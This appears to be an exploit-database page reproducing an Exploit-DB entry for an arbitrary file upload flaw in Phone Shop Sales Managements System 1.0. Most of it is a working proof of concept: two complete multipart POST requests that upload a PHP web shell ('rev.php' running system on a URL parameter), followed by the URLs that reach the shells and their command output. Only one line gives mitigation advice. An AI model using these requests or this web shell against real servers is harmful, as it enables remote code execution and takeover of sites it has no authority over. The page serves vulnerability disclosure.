header-logo
Suggest Exploit
vendor:
Phone Shop Sales Managements System
by:
faisalfs10x
9,8
CVSS
HIGH
Arbitrary File Upload to Remote Code Execution
434
CWE
Product Name: Phone Shop Sales Managements System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 10, XAMPP
2021

Phone Shop Sales Managements System 1.0 – ‘Multiple’ Arbitrary File Upload to Remote Code Execution

An arbitrary file upload vulnerability exists in Phone Shop Sales Managements System 1.0. An attacker can upload a malicious file to the server and execute arbitrary code. This can be exploited by sending a specially crafted HTTP POST request with a malicious file to the vulnerable application.

Mitigation:

The application should validate the file type and size before uploading it to the server. The application should also restrict the file types that can be uploaded.
Source

Exploit-DB raw data:

# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution
# Date: 2021-07-06
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10, XAMPP


###########
# PoC 1:  #
###########

Request:
========

POST /osms/Execute/ExAddProduct.php HTTP/1.1
Host: localhost
Content-Length: 2160
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/AddNewProduct.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0
Connection: close

------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductName"

camera
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BrandName"

soskod
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductPrice"

12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Quantity"

1
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="TotalPrice"

12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="DisplaySize"

15
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="OperatingSystem"

windows
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Processor"

4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="InternalMemory"

4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="RAM"

4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="CameraDescription"

lens
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BatteryLife"

3300
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Weight"

500
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Model"

AIG34
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Dimension"

5 inch
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ASIN"

9867638
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductImage"; filename="rev.php"
Content-Type: application/octet-stream

<?php echo "result: ";system($_GET['rev']); ?>
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="date2"

2020-06-03
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Description"

accept
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="_wysihtml5_mode"

1
------WebKitFormBoundaryIBZWMUliFtu0otJ0--



###########
# PoC 2:  #
###########

Request:
========

POST /osms/Execute/ExChangePicture.php HTTP/1.1
Host: localhost
Content-Length: 463
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/UserProfile.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594
Connection: close

------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="IDUser"

6
------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="Image"; filename="rev.php"
Content-Type: application/octet-stream

<?php echo "output: ";system($_GET['rev']); ?>
------WebKitFormBoundary4Dm8cGBqGNansHqI--



###########
# Access: #
###########

# Webshell access via:
PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami
PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami

# Output:
result: windows10\user

Navigation

Suggest Exploit

Services By CQR